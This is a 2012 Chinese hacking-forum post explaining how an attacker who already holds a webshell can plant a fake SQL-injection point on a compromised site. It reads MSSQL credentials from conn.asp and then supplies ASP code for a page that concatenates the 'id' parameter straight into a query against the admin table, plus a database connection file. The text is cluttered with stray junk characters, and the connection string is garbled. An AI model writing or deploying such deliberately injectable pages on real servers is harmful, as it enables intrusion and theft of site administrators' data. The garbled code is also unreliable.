找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1992|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵* M* |: @5 y4 Y
8 ^7 _' m% v3 k( G8 q
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息% {/ q' c  s3 h0 }, u
. g8 S' j5 l) w& M1 k* w4 d
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
) u3 m7 _  o+ h' g; P* R4 v1 }
! d$ P: D. t1 Q  T3 u首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
3 s: D$ q: @+ r8 `( T0 C
4 e* n# e8 j4 b密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& r+ z  f( @! j9 _' X+ i' Z  N4 D2 Z! H( |6 B3 Q
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- T* I6 w( z* @
5 Q8 T" ^+ u5 q) j1 V+ @; [程序代码5 n0 p/ M9 [# z1 J* Q) O
<!--#include file="xx.asp"-->
' G. s0 s' M- \* ]5 O1 |' h<%& ~" F- T2 y# q% P
set rs=server.createobject("ADODB.recordset")
' z7 ]9 ]7 I) |+ Z" t% W- bid = request("id"), h* l! V# n7 j, h
strSQL = "select * from admin where id=" & id
" s% i! K* z, s/ n6 Xrs.open strSQL,conn,1,31 X9 x$ R/ r; `2 ~5 _! |" h) ^& Q
rs.close
( b( d4 U  `0 g1 V+ a%>! ]8 \; d& B) n% D& h# U* n3 I
4 P1 u3 w4 |5 C
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在) K! R" c! @9 v/ O. a

4 }5 m( ~/ K! D: \' {! y你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!8 j+ e+ d% o, W
  J1 H8 L* l% o+ x
然后就要构造一个连接数据库的文件了,代码如下:1 f/ Z4 e( F# o5 u- H- ~
程序代码1 f5 l7 x1 ^; d& x) R' c3 Y  w
<%        " Y1 Y! ~: s" I0 x
strSQLServerName = "000.000.000.000"     '服务器名称或地址
! w  D$ _  H9 f$ D3 c; @strSQLDBUserName = "sqlname"         '数据库帐号) s3 I6 S, \% i& T: L2 B7 p9 _
strSQLDBPassword = "sqlpass"         '数据库密码1 n: }8 F& S9 ]( J! j- Y& v, l' {
strSQLDBName = "sqldataname"           '数据库名称
" K0 z) {, T4 i" T) @% K- b" }Set conn = Server.CreateObject("ADODB.Connection")
" A' f3 C9 c# [0 tstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
/ b+ E! L( `$ ?) y* Cconn.open strCon
8 ~) W# S* v" h3 L  F%>
; G6 S7 @  z% }) z5 s
% H; y# K, E0 i& |2 S这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
& V) z& S% l3 J* v. J4 V( L5 }$ I8 I' a7 l; i, H& g' e& C
就这样,正常情况下,就OK了,伪造成功……
/ @& t2 k2 S1 T0 M% m" P1 z
' M  Z2 }6 Q2 e3 c           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表